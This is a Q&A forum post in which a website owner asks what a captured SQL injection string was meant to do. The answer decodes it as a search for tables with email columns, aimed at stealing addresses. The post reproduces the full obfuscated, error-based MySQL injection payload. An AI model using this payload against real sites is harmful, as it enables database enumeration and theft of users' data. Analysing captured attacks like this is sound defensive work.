user3371970 user3371970 - 8 days ago 6
SQL Question

What is the purpose of this sort of SQL injection?

I have a website. If there are errors, I send an email out to a system account. I see the following today, which I assume was the SQL. I am going to have to put a fix. Would anyone know what the person was trying to achieve by doing this?

AdID=50427 or 1=(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x25656d61696c25 and not t./**/tAbLe_nAmE in(0x42524944455f54424c,0x42524944455f54424c5f505542,0x434f4e54414354,0x434f4e544143545f54424c,0x47524f4f4d5f54424c,0x47524f4f4d5f54424c5f505542,0x4f524445525f54424c,0x7068703132315f75736572735f64656c65746564,0x535542534352494245525f4c495354,0x555345525f44454c45544544,0x555345525f50524f46494c455f44454c45544544) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 11,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and 1=1

Answer

Specifically it is trying to find which non-system tables have a column containing email and is excluding the following tables:

BRIDE_PUB   
BRIDE_TBL_PUB   
CONTACT 
CONTACT_TBL 
GROOM_TBL   
GROOM_TBL_PUB   
ORDER_TBL   
php121_users_deleted    
SUBSCRIBER_LIST 
USER_DELETED    
USER_PROFILE_DELETED

Which I assume the attacker already knows about.

So basically they are trying to steal your Email addresses to sell as mailing lists (this is typical for SQL injection attacks).

Comments